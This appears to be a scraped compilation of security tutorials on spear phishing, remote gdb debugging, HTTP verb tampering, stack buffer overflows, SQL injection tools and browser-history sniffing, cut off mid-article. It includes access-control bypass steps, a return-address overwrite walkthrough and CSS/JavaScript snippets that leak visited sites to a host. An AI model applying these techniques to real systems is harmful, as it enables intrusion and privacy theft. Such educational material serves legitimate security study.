ICS-CERT MONITOR report related to the period September 2014 – February 2015, revealed that the majority of the attacks involved entities in the Energy Sector followed by those in Critical Manufacturing. Figure 2 – ICS-CERT MONITOR report related to the period September 2014 – February 2015 Spear phishing attacks appear among the principal attack vectors adopted by threat actors, but it is important to highlight that the report doesn’t mention cyber terrorism among possible motivations for the attacks. The fact that spear phishing attacks are effective to compromise the systems in the energy sector should make us reflect on the potential effectiveness of the cyber threat if it is adopted by terrorist groups. In April 2014, security experts at Symantec discovered a cyber espionage campaign targeting energy companies around the world by infecting them with a new trojan dubbed Laziok. Also in this case, the attack chain starts with a spear phishing attack. The emails used by hackers come from the moneytrans[.]eu domain, which acts as an open relay Simple Mail Transfer Protocol (SMTP) server. The e-mails contain an attachment, typically in the form of an Excel file, that exploits a well-known Microsoft Windows vulnerability patched in 2012 and that was exploited by threat actors behind Red October and CloudAtlas campaigns. The experts confirmed that the bad actors who used Trojan.Laziok malware to target energy companies haven’t adopted a sophisticated hacking technique. The investigation demonstrated that they exploited an old vulnerability by using exploit kits easy to find in the underground market. This kind of operation could be potentially conducted by groups of terrorists that intend to collect information on the IT infrastructure adopted by an organization to compromise it and cause serious damages to the process of a refinery or a nuclear plant. Since now security experts have no evidence for the availability of zero-day exploits in the arsenal of terrorists, the spear phishing campaign run by groups linked to the ISIS or Al-Qaida are quite different from the attacks run by APT groups backed by governments. Unfortunately, it is impossible to exclude that in the future group of terrorists with significant financial resources will have access to the underground market of zero-day exploits and purchase them to conduct targeted campaigns aimed to cause destruction and the lost of human lives. Conclusion Spear phishing represents a serious threat for every industry, and the possibility that a group of terrorists will use this technique is concrete. To prevent spear phishing attacks, it is crucial to raise awareness of the mechanics behind these kind of offensives. By sharing the knowledge of the techniques and tactics of the threat actors, it is possible to reduce in a significant way the likelihood and impact of spear phishing campaigns. To prevent spear phishing attacks, it is necessary that everyone in an organization has a deep knowledge of the threat and defense mechanisms. The pillars for an effective defense against the spear phishing attacks are: Awareness of the cyber threat Implementation of effective email filtering Implementation of effective network monitoring Spear phishing attacks are still a primary choice for cyber criminals and intelligence agencies that intend to steal money and sensitive information, but the technique could be a dangerous weapon to start a cyber terrorism attack. In order to protect our society we must trigger a collective defense. As explained by many security experts, the government cannot prevent spear-phishing attacks against private firms, but a successful attack against private industrial systems can be used to harm the security of a nation and take innocent lives. For this reason, it is important to share information on ongoing spear-phishing attacks and track potentially dangerous threat actors, especially cyber terrorists. Homeland security and national defense need a collective effort! References ISIS operates spear phishing attacksSecurity Affairs Phishing: A Very Dangerous Cyber Threat - InfoSec Institute The US energy industry is constantly under cyber attacksSecurity Affairs Energy companies infected by newly Laziok trojan malwareSecurity Affairs ICS-CERT- Most critical infrastructure attacks involve APTsSecurity Affairs http://techcrunch.com/2015/03/27/spear-phishing-could-enable-cyberterrorism-attacks-against-the-u-s/ http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-spear-phishing-email-most-favored-apt-attack-bait.pdf https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/ Phishing: A Very Dangerous Cyber Threat - InfoSec Institute Source
-
In the world we live in, there are different kinds of professions where debugging has been a vital piece of knowledge we must have in order to do our jobs successfully or more efficiently. There are different professions where debugging knowledge is important and are outlined below: Programmers: every programmer knows that debugging the program when it’s not working properly is the only right way to determine why the program is misbehaving and is not producing the intended results. There are still those programmers out there who use different kinds of print statements in order to display the debugging information in a way that makes sense to them only and for a limited amount of time. After a certain period of time, the debugging comments displayed in the stdout (or anywhere else where the output could easily be inspected, like in a file) don’t make any sense anymore, which is the primary reason why we should stop debugging like that – if we can even call it debugging at this point. In any case, whenever we put any kind of print statements into the code, the whole code needs to be recompiled when written in a low-level programming language. System Administrators: various system administrators are tasked with setting up and maintaining a whole infrastructure of the company, which is not an easy task to deal with. There will be different times when the programs of the programmers will malfunction and the system administrator will be the only one having access to the production environment where the program malfunctions. At times like these, the administrator should use a debugger in order to determine what the problem is and report it back to the programmers in order to fix it as soon as possible. Security Researchers: debugger skills can be lethal in the hands of a security specialist, because he can use it to make a program do unexpected things. Debuggers are indispensable when used to analyze how the program works in order to gain deeper understanding about the program internals. There are various fields of a security domain where knowledge about debuggers is a must have skill and the people not having mastered it already will have a hard time completing their jobs; such fields include reverse engineering, malware analysis, exploit writing, etc. The skills will come in handy even when dealing with web applications, for example, when we’ve reversed engineered a web application written in ASP.NET, which used custom encryption/decryption functions in order to pass data between the client and a server in an encrypted form. Having the reverse engineering skills, we quickly put together an algorithm, which was able to decrypt the encrypted data in order for us to modify it and then re-encrypt the data back to its encrypted form to have it sent to the server for processing, which revealed interesting XSS, URL redirection and other kinds of bugs. Despite our job profession outlined above, we should invest the time and learn how to debug properly, which will enable us to find problems sooner and with ease; no more print statements need be introduced into the code. When debugging properly, we have to choose a debugger of our choice and run the program in a debugger, and set appropriate breakpoints so the execution will stop at the time of the program misbehavior, after which we can inspect the program state. Inspecting the program state doesn’t include only a few of the items we had output to the stdout when doing it the wrong way, but the whole program state – we no longer have to put additional print statements into the code, recompile and rerun the program in order to get more information about the program state. Instead we can get all that information for free out of a program stopped in a debugger without many problems. Presenting different kinds of debuggers There are many debuggers that we can use for debugging and are separated into two groups at the highest level, which are presented below. Note that most operating systems are constituted from two parts: the user-mode applications in ring 3, where all of the applications run from and have only limited access via the system calls to the kernel-mode operating system code in ring 0. Therefore, depending on whether we’re debugging a user-mode application in ring 3 or an operating system function/structure in ring 0, the debuggers are divided between two groups presented below. Kernel-Mode debuggers: the debuggers running in kernel-mode, which are able to debug the kernel operating system internals as well as the user-mode applications. An example of debuggers supporting kernel-mode debugging are the following: SoftICE, Syser, HyperDbg, WinDbg, Gdb, VirtDbg. User-Mode debuggers: the debuggers running in user-mode, which are able to debug only the user-mode applications, but don’t have access to the kernel. User-mode debuggers are the following: OllyDbg, Hopper, Hiew, Ida Pro, Dbg, x64dbg, VDB, Radare, etc. All of the debuggers have support for debugging local programs or systems, but only some of them have remote debugging possibilities that allow us to use debuggers in the cloud. The following debuggers have a possibility of a remote debugging session, which we can use in a cloud-based session and debug the problem remotely: WinDbg Gdb VirtDbg Ida Pro Radare Hopper Remote debugging In this example, we’ll take a look at how we can debug an application running in the cloud remotely by using gdb, which can be downloaded and installed by running the following commands: wget ftp://sourceware.org/pub/gdb/releases/gdb-7.5.tar.bz2 # tar xvjf gdb-7.5.tar.bz2 # cd gdb-7.5/gdb/gdbserver/ # ./configure && make && make install Let’s first display all the parameters that we can pass to gdbserver program. # gdbserver Usage: gdbserver [OPTIONS] COMM PROG [ARGS …] gdbserver [OPTIONS] --attach COMM PID gdbserver [OPTIONS] --multi COMM COMM may either be a TTY device (for serial debugging), or HOST:PORT to listen for a TCP connection. Options: --debug Enable general debugging output. --remote-debug Enable remote protocol debugging output. --version Display version information and exit. --wrapper WRAPPER -- Run WRAPPER to start new programs. --once Exit after the first connection has closed. Let’s now present a simple program, that accepts exactly one argument, which must be set to the “secretarg” string in order for the program to return the secret key “KeepingHiddenSecrets”. Otherwise, the program exists with a notification that incorrect input string was passed to the program as the first argument. The program can be seen below. #include <stdio.h> int main(int argc, char **argv) { if(argc != 2) { printf("The wrong number of parameters passed into the program; quitting.\n"); exit(1); } if(strcmp(argv[1], "secretarg") == 0) { printf("The secret password is: KeepingHiddenSecrets.\n"); } else { printf("The secret password is not revealed to you, because you didn't supply the right secret argument.\n"); } return 0; } We can compile the program into the main executable by simply running the “gcc main.c -o main” command, after which we can run the program by running “./main secretarg”, which will print the secret key to the standard output. Imagine that we’re a system administrator or a security researcher and only have access to the main executable, but we don’t have the code, neither we know the secret argument we have to pass to the program in order to reveal the secret key. To complicate matters somehow, let’s also imagine that the program is running on a server on the cloud and can’t be easily recompiled and used on our local computer; nevertheless, we have access to the server and we’re able to run and debug the program. Note that the compiled program should also be copied to the host system where we’ll be inputting the gdb commands in order to be sent to the gdbserver, so the gdb will be able to load and use program symbols. In such cases, it’s best to run the program remotely in the cloud in gdbserver in order to debug it. We can use the command line below to bind to the 0.0.0.0:8080 host and port combination where the remote debugging session will be accessible. We have to run the following commands on the remote host in the cloud where the program will be debugged. Note that the two processes are created during the debugging session because we’ve invoked the program two times, once with the wrong input parameter and another time with the right input parameter. The first invocation of the program revealed that the input argument was not correct, while the second invocation received the secret password, because we’ve passed the correct input argument to the program invocation. # gdbserver --multi 0.0.0.0:8080 Listening on port 8080 Remote debugging from host 4.3.2.1 Process /srv/main created; pid = 20272 The secret password is not revealed to you, because you didn't supply the right secret argument. Child exited with status 0 Process /srv/main created; pid = 20274 The secret password is: KeepingHiddenSecrets. Child exited with status 0 Then we can use the netstat command to confirm whether the gdbserver has actually been started, which can be seen below. # netstat -luntp | grep LISTEN tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20223/gdbserver After starting the remote session, we can connect to it by executing the following commands on the client, which connects to the remote session and starts debugging the remote process. # gdb (gdb) target extended-remote 1.2.3.4:8080 Remote debugging using 1.2.3.4:8080 (gdb) set remote exec-file /srv/main (gdb) file /tmp/main Reading symbols from /tmp/main...done. (gdb) set architecture i386:x86-64:intel The target architecture is assumed to be i386:x86-64:intel (gdb) run test Starting program: /tmp/main test [Inferior 1 (process 20272) exited normally] (gdb) run secretarg Starting program: /tmp/main secretarg [Inferior 1 (process 20274) exited normally] At this point we can run any command supported by the gdb debugger right on the remote session in the cloud, which enables us to do anything we would have done with a local process. Conclusion Debugging skills are a vital and very important piece of knowledge we have to gain in order to complete our job faster and more efficiently. The hardest thing to do in the process is grasping the idea that such a knowledge will actually benefit us all. After we’ve convinced ourselves that the debugging knowledge will come in handy, we have to choose an appropriate debugger and learn as much as we can about it. Usually, there are different articles and tutorials, even books written on the subject, but we must not despair. We can start slow with a simple tutorial and work our way from there. Whenever a new bug arises, we should take some extra time to find the problem with a debugger rather than using print statements. At first, it will seem like a waste of time, but sooner or later, it will become extremely easy and the first benefits of the newly acquired knowledge will be visible. We’ve seen how easy it is to debug applications in the cloud by using one of the remote capabilities of various debuggers that support it. By using remote debugging, we can easily start a program in the cloud and debug it remotely, not having to setup our own environment when trying to determine what the problem was. If the client wishes to debug a software, which requires various pieces to work together, we can easily use remote debugging capabilities to remotely identify the problem they have been facing. This gets more and more important when debugging SCADA applications, which require certain kinds of hardware that we normally don’t have access to in our every day lives, like a nuclear plant, an air conditioning, etc. In such circumstances, we would have to fly to the client’s location in order to identify the problem at hand, but by using remote debugging capabilities we can do it from our own office from an entirely different country, which reduces costs considerably. We should all invest the time to learn and obtain debugging knowledge, which will save us time and money when trying to determine the cause of the problem. It is only by practicing that we become better and better at what we do and it’s the same with debugging: keep practicing and enjoy using your newly obtained knowledge. Source
-
What is an HTTP VERB? Hypertext transfer protocol (HTTP) gives you list of methods that can be used to perform actions on the web server. Many of these methods are designed to help developers in deploying and testing HTTP applications in development or debugging phase. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Also, some high vulnerability like Cross Site Tracing (XST), a form of cross site scripting using the server’s HTTP TRACE method, is examined. In HTTP methods, GET and POST are most commonly used by developers to access information provided by a web server. HTTP allows several other method as well, which are less known methods. Following are some of the methods: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT Many of these methods can potentially pose a critical security risk for a web application, as they allow an attacker to modify the files stored on the web server, delete the web page on the server, and upload a web shell to the server which leads to stealing the credentials of legitimate users. Moreover, when rooting the server, the methods that must be disabled are the following: PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an ASP or PHP file that executes commands by invoking cmd.exe), or by simply using the victim’s server as a file repository. DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a Denial of Service (DOS) attack. CONNECT: This method could allow a client to use the web server as a proxy TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes of developers. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which has been discovered by Jeremiah Grossman. If an application requires any one of the above mentioned, such as in most cases REST Web Services may require the PUT or DELETE method, it is really important to check that their configuration/usage is properly limited to trusted users and safe environment. Many web environments allow verb based authentication and access control (VBAAC). This is basically nothing but a security control using HTTP methods such as GET and POST (usually used). Let’s take an example to make you understand better. JAVA EE web XML file <security-constraint> <web-resource-<a href="http://resources.infosecinstitute.com/collection/">collection</a>> <url-pattern>/auth/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>root</role-name> </auth-constraint> </security-constraint> In the above example, the rule is limited to the /auth directory to root role only. However, this limitation can be bypasses using HTTP verb tempering even after limited/restricted access to the mentioned role. As we can see, the above mentioned configuration has only restricted the same using GET and POST methods only. We can easily bypass this with the use of the HEAD method; you can also try any other HTTP methods as well such as PUT, TRACK, TRACE, DELETE, etc. Also, you can try to bypass the same by sending arbitrary strings such as ASDF as an HTTP verb (method). Following are some conditions where bypassing is possible: It has GET functionality that is not idempotent or execute an arbitrary HTTP Method It uses a security control that lists HTTP verbs The security control fails to block HTTP methods that are not listedThese are the most common scenarios where you can bypass the same. It also depend upon rule misconfiguration. How we can bypass VBAAC with HTTP methods Using HEAD method As mentioned above, the HEAD Method is used to fetch a result similar to GET but with no response body. Imagine a URL in your application that is protected by security constraints that restrict access to the /Auth directory with GET and POST only. http://httpsecure.org/auth/root.jsp?cmd=adduser If you try to force browse to the URL in a browser, a security constraint will check the rule to see whether the requested resource and requestor are authorized or not. The first rule will check the HTTP method as it came from the browser, so it should be a GET or POST method that’s stopped by the security constraint. If you use a browser proxy such as BurpSuite to intercept the request and craft it by changing GET to HEAD method, since HEAD method is not listed in the security constraint the request willnot be blocked. So the adduser function will be successfully invoked and you will get the empty response back in the browser due to HEAD functionality. Using Arbitrary HTTP Verbs Most of the platforms allow the use of arbitrary HTTP verbs such as PHP, JAVA EE. These methods execute similar to a GET request, which enables you to bypass the same. Most importantly, using the arbitrary methods response will not be stripped as it is for the HEAD method. You can see the internal pages easily. With the using arbitrary method, instead of the HEAD method page source code can be viewed. Some Vendors Allow HEAD Verbs Many server vendors allow HEAD verbs by default, such as: APACHE 2.2.8 JBOSS 4.2.2 WEBSPERE 6.1 TOMCAT 6.0 IIS 6.0 WEBLOGIC 8.2 Allowing the HEAD method is not a vulnerability at all, as it is a requirement in the RFC. Let’s have a look at some of the most popular outdated application security mechanisms to see if we can use them to bypass VBAAC.Following are the servers which may get affected by VERB tampering techniques. JAVA EE Allow HTTP Verbs in Policy -YES Bypassing Possible – YES HEAD can be in policy – YES .htaccess Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES ASP.NET Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES Java EE Containers Let’s consider the following security constraint policy: <security-constraint> <display-name>Example Security Constraint Policy</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <!-- Define the context-relative URL(s) to be protected --> <url-pattern>/auth/security/*</url-pattern> <!-- If you list http methods, only those methods are protected --> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> In the above mentioned code, listed methods are protected, so this rule will only trigger if a request for anything in the /auth/security directory uses a verb in the <http-method> list. The best way to implement this policy would be to block any method that is not listed, butthat is not the way these mechanisms currently behave, and you can see that the HEAD verb is not in this list. So, forwarding the HTTP HEAD request will bypass this policy entirely, and after that, the application server will pass the request to the GET handler. The right approach to secure a JAVA EE is to remove all the <http-method> elements from this policy, which simply applies this rule to all the HTTP methods, but if you still want to restrict access to specific method, then you need to setup two policies as mentioned below. <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> </web-resource-collection> ... </security-constraint> So, the first policy denies a GET request to access and second policy denies all. ASP.NET Authorization Let’s have a look at the ASP.NET authorization security mechanism configuration, which is vulnerable to bypass with VBAAC. <authorization> <allow verbs="POST" users="joe"/> <allow verbs="GET" users="*"/> <deny verbs="POST" users="*"/> </authorization> In the above mentioned rule, the user JOE can only submit a POST request. In this example, this cannot be bypassed, the reason being GET methods are allowed to everyone. So, there are no securities to bypass using the HEAD method. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="POST,GET" users="*" /> </authorization> This one is vulnerable to bypass using HEAD method. This is possible because .Net implicitly inserts an “allow all” rule in to each authorization. After listing their role entitlements appropriately, append a “deny all” rule. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="*" users="*" /> </authorization> This will ensure that the only requests that pass the authorization check are those that have a specific HTTP verb that is in the authorization rule. Some Points to remember 1) Always enable deny all option 2) Configure your web and application server to disallow HEAD requests entirely Thanks for reading References https://www.owasp.org/index.php/Test_HTTP_Methods_%28OTG-CONFIG-006%29 http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-verb- tampering Source
-
In previous articles, we got to know the basics of the Stack Based Buffer Overflow and changing the address in the run time by modifying the register value using the debugger. In this article, we will analyze another simple C program which takes the user input and prints the same input data on the screen. In this article, we will not change any values by modifying the value through debugger like we did in the last article, but we will learn how to do it by user input values. Let us have a look at the program. In the program shown in the above screen shot, we have created two functions marked as 1 and 2. The 1st is the main function of the program from where the program execution will start. In the main function, there is a command to print message on the screen, then it is calling the V1 function. The 2nd one is defining the V1 function in which we have defined an array of size 10, then there are commands to take the user input and print it back to the output screen. In the V1 function, we have used the ‘gets’ function to take the user input. The ‘gets’ function is vulnerable to buffer overflow as it cannot check whether the size of the value entered by the user is lesser or greater than the size of the buffer. So, ‘gets’ would take whatever value the user enters and would write it into the buffer. If the buffer size is small, then it would write beyond the buffer and corrupt the rest of the stack. So, let’s analyze this with a debugger. Note: You can download the EXE file here: Download Now, let’s run this program normally. We can see that our program runs perfectly and it asks to “Enter the name”. When we enter the name and hit the enter key it accepts the value without crashing the program, as the input string is less than the size of the buffer we have created. Now, let us run the program again in the same manner, but this time we will enter a value which is greater in size than the buffer size. For this we enter 35 A’s (41 is the hexadecimal representation of A), then the program throws an error and our program gets crashed. We can see the same in the below screen shot. If we click on “click here” in the window shown in the above screenshot, we can see the following type of window on the screen. By closely looking into the red box, we can see the offset is written as ‘41414141’, which is actually the hexadecimal value of A. This clearly indicates that the program is vulnerable to buffer overflow. Note: In many cases, an application crash does not lead to exploitation, but sometimes it does. So, let us open the program with the debugger and create a break point just before the function ‘V1? is called and note down the return address. The return address is actually the next instruction address from where the function call happened. We can see the same in the below screen shot. (We have already mentioned all the basics in previous articles, so we are not going to discuss basics in detail again.) We can create the break point by selecting the address and pressing the F2 key. Run the program by hitting the F9 key and then click on F7 which is Step Into. It means we have created a break point before the V1 function call, after that the function ‘V1? is called and execution control has switched to the V1 function, and the Top of the Stack is now pointing to the return address of the main function, which can be seen in the screen shot given below. Now, we will note down the written address position as well as the written address from the Top of the Stack, which is the following. Table 1 Return Address Position Address Return Address to the Main Program 0022FF5C 004013FC We will overwrite this return address with the user input data in the next step of the article. If we look at the program screen we can see ‘Main Function is called’ is being shown on the screen. Now, hit Step Over until we reach the ‘gets’ function. This can be done by pressing the F8 key. As can be seen in the above screenshot, we have reached the gets function, now the program has continued to run. When we look at the program screen, we can see the program is asking to enter the name, so enter the name and hit the enter key. As can be seen, when we enter the name and hit the enter key, then execution control has moved to the next instruction and the program has again reached the Paused state. Now, hit the Step Over (F8 Key) until we reach the RETN instruction. If we look into the window 4 now, we can see that the top of the stack is pointing to the return address which is the following. Table 2 Return Address Position Address Return Address to the Main Program 0022FF5C 004013FC Now, we will have to compare the addresses of Table 1 and Table 2. Till now nothing caused any change in the tables we created, as we did not input anything wrong in the program. So, let us restart the program again and input a very long string value into the program input and analyze the return address when the program execution control reaches the RETN instruction. We can restart the program by pressing CTRL+F2 and input 35 A’s into the program. As can be seen in the above screenshot, we have entered a very long input value in the program, now hit the F8 key (Step Over) until we will reach the RETN instruction. Now, we will create another table and note down the Top of the Stack values into the table. Table 3 Return Address Position Address Return Address to the Main Program 0022FF5C 41414141 If we compare Table 2 and Table 3 addresses, we can see return address to the main program has been replaced to 41414141 in Table 3. 41 is actually the ASCII HEX value of A. So, we can see the return address has been overwritten by the user input value A. Now think, what if we could modify the input value at this position, and write some different address which points it to a location in the memory that contains your own piece of code. In this way, we can actually change the program flow and make it execute something different. The code that we want to execute after controlling the flow is often referred to as a “SHELLCODE”. We will discuss shellcode in later articles. But the string that we have entered contains 35 A’s, we do not know which ones have overwritten the stack. We will have to identify the positions in the user input where the stack is overwritten into the memory. We can do it by entering some pattern instead of A’s. The input pattern could be anything. We will use the following pattern. A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6Q7U8S9T0U1V2W3X4Y5Z6 In this article, we have created this pattern manually, but in further articles we will use automated Metasploit scripts to generate the pattern. Now, we need to restart the program again in the debugger and enter the above pattern as an input in the program we created. As can be seen in the above screenshot, we have entered the pattern when the program asked for the input. Now, press F8 (Step Over) until we reach the RETN instruction. As we can see in the screenshot, we have reached the RETN instruction which can be seen in screen 1, and the Top of the Stack address has been overwritten by the user input and is pointing to the value “O5P6?. So, this 4 byte data is actually the return address in the user input. So, let us verify this by replacing the “O5P6? to “BBBB” in our pattern before entering the user input. So, now according to our logic, the return address should point to “BBBB” in the memory when we reach the RETN instruction. As can be seen in the above screenshot, our B’s have been successfully written in the position where the return address should be. So, if we change our B’s to the address somewhere else in the memory, then the program execution would go to that address and execute that instruction. In this way, we can control the program flow and run our own code just by manipulating the input data. So we have understood the following things by completing this exercise: Finding and Analyzing Buffer Overflow Overwriting Stack by User Input Data Identifying the Return Address Position in User Input References https://www.owasp.org/index.php/Buffer_overflow_attack http://en.wikipedia.org/wiki/C_file_input/output http://www.exploit-db.com/ http://www.pentesteracademy.com/ https://www.corelan.be/ Source
-
BSQL Hacker BSQL hacker is a nice SQL injection tool that helps you perform a SQL injection attack against web applications. This tool is for those who want an automatic SQL injection tool. It is especially made for Blind SQL injection. This tool is fast and performs a multi-threaded attack for better and faster results. It supports 4 different kinds of SQL injection attacks: Blind SQL Injection Time Based Blind SQL Injection Deep Blind (based on advanced time delays) SQL Injection Error Based SQL Injection This tool works in automatic mode and can extract most of the information from the database. It comes in both GUI and console support. You can try any of the given UI modes. From GUI mode, you can also save or load saved attack data. It supports multiple injection points including query string, HTTP headers, POST, and cookies. It supports a proxy to perform the attack. It can also use the default authentication details to login into web accounts and perform the attack from the given account. It supports SSL protected URLs, and can also be used on SSL URLs with invalid certificates. BSQL Hacker SQL injection tool supports MSSQL, ORACLE and MySQL. But MySQL support is experimental and is not as effective on this database server as it is for other two. Download BSQL Hacker here: Download SQLmap SQLMap is the open source SQL injection tool and most popular among all SQL injection tools available. This tool makes it easy to exploit the SQL injection vulnerability of a web application and take over the database server. It comes with a powerful detection engine which can easily detect most of the SQL injection related vulnerabilities. It supports a wide range of database servers, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB. Most of the popular database servers are already included. It also supports various kind of SQL injection attacks, including boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. One good feature of the tool is that it comes with a built-in password hash recognition system. It helps in identifying the password hash and then cracking the password by performing a dictionary attack. This tool allows you to download or upload any file from the database server when the db server is MySQL, PostgreSQL or Microsoft SQL Server. And only for these three database servers, it also allows you to execute arbitrary commands and retrieve their standard output on the database server. After connecting to a database server, this tool also lets you search for specific database name, specific tables or for specific columns in the whole database server. This is a very useful feature when you want to search for a specific column but the database server is huge and contains too many databases and tables. Download SQL Map from the link given below: https://github.com/sqlmapproject/sqlmap SQLninja SQLninja is a SQL injection tool that exploits web applications that use a SQL server as a database server. This tool may not find the injection place at first. But if it is discovered, it can easily automate the exploitation process and extract the information from the database server. This tool can add remote shots in the registry of the database server OS to disable data execution prevention. The overall aim of the tool is to allow the attacker to gain remote access to a SQL database server. It can also be integrated with Metasploit to get GUI access to the remote database. It also supports direct and reverse bindshell, both TCP and UDP. This tool is not available for Windows platforms. It is only available for Linux, FreeBSD, Mac OS X and iOS operating systems. Download SQLninja from the link given below: http://sqlninja.sourceforge.net/ Safe3 SQL Injector Safe3 SQL injector is another powerful but easy to use SQL injection tool. Like other SQL injection tools, it also makes the SQL injection process automatic and helps attackers in gaining the access to a remote SQL server by exploiting the SQL injection vulnerability. It has a powerful AI system which easily recognizes the database server, injection type and best way to exploit the vulnerability. It supports both HTTP and HTTPS websites. You can perform SQL injection via GET, POST or cookies. It also supports authentication (Basic, Digest, NTLM HTTP authentications) to perform a SQL injection attack. The tool supports wide range of database servers including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. For MYSQL and MS SQL, it also supports read, list or write any file from the database server. It also lets attackers execute arbitrary commands and retrieve their output on a database server in Oracle and Microsoft SQL server. It also support web path guess, MD5 crack, domain query and full SQL injection scan. Download Safe3 SQL injector tool from the link given below: http://sourceforge.net/projects/safe3si/ SQLSus SQLSus is another open source SQL injection tool and is basically a MySQL injection and takeover tool. This tool is written in Perl and you can extend the functions by adding your own codes. This tool offers a command interface which lets you inject your own SQL queries and perform SQL injection attacks. This tool claims to be fast and efficient. It claims to use a powerful blind injection attack algorithm to maximize the data gathered. For better results, it also uses stacked subqueries. To make the process even faster, it has multi-threading to perform attacks in multiple threads. Like other available SQL injection tools, it also supports HTTPS. It can perform attacks via both GET and POST. It also supports, cookies, socks proxy, HTTP authentication, and binary data retrieving. If the access to information_schema is not possible or table does not exist, it can perform a bruteforce attack to guess the name of the table. With this tool, you can also clone a database, table, or column into a local SQLite database, and continue over different sessions. If you want to use a SQL injection tool against a MySQL attack, you will prefer this tool because it is specialized for this specific database server. Download SQLsus from the link given below: http://sqlsus.sourceforge.net/ Mole Mole or (The Mole) is an automatic SQL injection tool available for free. This is an open source project hosted on Sourceforge. You only need to find the vulnerable URL and then pass it in the tool. This tool can detect the vulnerability from the given URL by using Union based or Boolean based query techniques. This tool offers a command line interface, but the interface is easy to use. It also offers auto-completion on both commands and command arguments. So, you can easily use this tool. Mole supports MySQL, MsSQL and Postgres database servers. So, you can only perform SQL injection attacks against these databases. This tool was written in Python and requires only Python3 and Python3-lxml. This tool also supports GET, POST and cookie based attacks. But you need to learn commands to operate this tool. Commands are not typical but you need to have them. List those commands or learn, it is your personal choice. Download Mole SQL injection tool from the link below: http://sourceforge.net/projects/themole/files/ Source
-
Exploiting Same Origin with Browser History Browser history attacks leak sensitive information regarding different origins. They allow you to determine what origins the user has been visiting. In a legacy browser, a browser history attack typically involved simply checking the color of links (blue) written to the page. You will briefly explore using CSS Colors, but today’s latest browsers have been patched, so you won’t find this type of attack. This article will describe attack methods that are currently the most effective for revealing browser history information across a range of browsers. A few examples of lesser-known browsers vulnerable to these history-stealing vulnerabilities, like Avant and Maxthon browsers, will also be explored. Using CSS Colors In previous days, stealing browser history using CSS information was very easy and possible. This attack was performed through the abuse of the visited CSS selector. The technique was very simple but very effective. Take for example the following code: <a id="site_1" href="http://httpsecure.org">link</a> CSS action selector could be used to check if the target visited the previous link, and therefore would be present in the browser history looking similar to this: #1: visited { background: url(/httpsecure.org?site=securityflaw); } In the above mentioned code, the background selector is used, but you can use any selector where a URI can be specified. In the instance of httpsecure.org being present in the browser’s history, a GET request to httpsecure.org?site=securityflaw will be submitted. Jeremiah Grossman found a similar issue exploiting technique in 2006 that also relied on checking the color of a link element. In most browsers, the default behavior when a link had already been visited by user set the color of the link text from blue to violet. On the other way, if the link had not been visited, it was set to its default color (blue). In Grossman’s original Proof of Concept, the link visited by user style was overridden with a custom style/color (such as pink). A script was then used to dynamically generate links on the page, potentially hidden from the user. These were compared with the previously overridden pink color link. If a match was found, an attacker would know that the site was present in the browser history. Consider the following example: <html> <head> <style> #link:visited {color: # FF1493;} </style> </head> <body> <a id="link" href="http://httpsecure.org" target="_blank">clickhere</a> <script> var link = document.getElementById("link"); var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color"); console.log(color); </script> </body> </html> If the link was already visited by the user, and if the browser is vulnerable to this issue, the output in the console log would be rgb(255,20,147), which corresponds to the pink color overridden in the CSS. If you run the above mentioned snippet in Firefox (which is already patched against this attack), it will always return rgb(0, 0, 238). Nowadays, most modern browsers have patched this behavior. For example, Firefox patched this technique in 2010. Using Cache Timing Felten and Schneider wrote the first white papers on the topic of cache timing attacks in 2000. The paper, titled “Timing Attacks on Web Privacy,” was mainly focused on measuring the time required to access a resource with or without browser caching. Using this information, it was quite possible to deduce if the resource was already retrieved (and cached). The limitation of this attack was that querying the browser cache during the initial test was also tainting it. Michal Zalewski found another way which was totally non-destructive to extract browser history using a previously mentioned cache-timing technique. Zalewski’s way consists of loading resources in iframes, trapping same origin policy violations, and preventing the alteration of the cache. Iframes are great, just because the same origin policy is enforced and you can prevent the iframe from fully loading the resource, preventing the modification of the same into the local cache. The cache stays untouched, as short timings are used when loading and unloading resources. As soon as it can be ascertained that there is a cache miss on a particular resource, the iframe loading is stopped. This behavior allows testing the same resource again at a later stage. The most effective resources to target using this technique are JavaScript or CSS, reason being they are often cached by the browser, and are always loaded when browsing to a target application. These resources will be loaded in iframes, and it should not include any framebusting logic, such as X-Frame-Options (other than Allow). Mansour Behabadi found a different technique that relied on the loading of images instead. The technique currently only works on WebKit- and Gecko-based browsers. When your browser has cached an image, it usually takes less than 10 milliseconds to load it from the cache. If the image is not found in the browser cache, the fetching will start from the server and time depend upon image size and net connection speed. Using this timing information, you can check out whether a target’s browser has previously visited websites. Note: You can read the full source code of this technique on https://browserhacker.com, or the Wiley website at 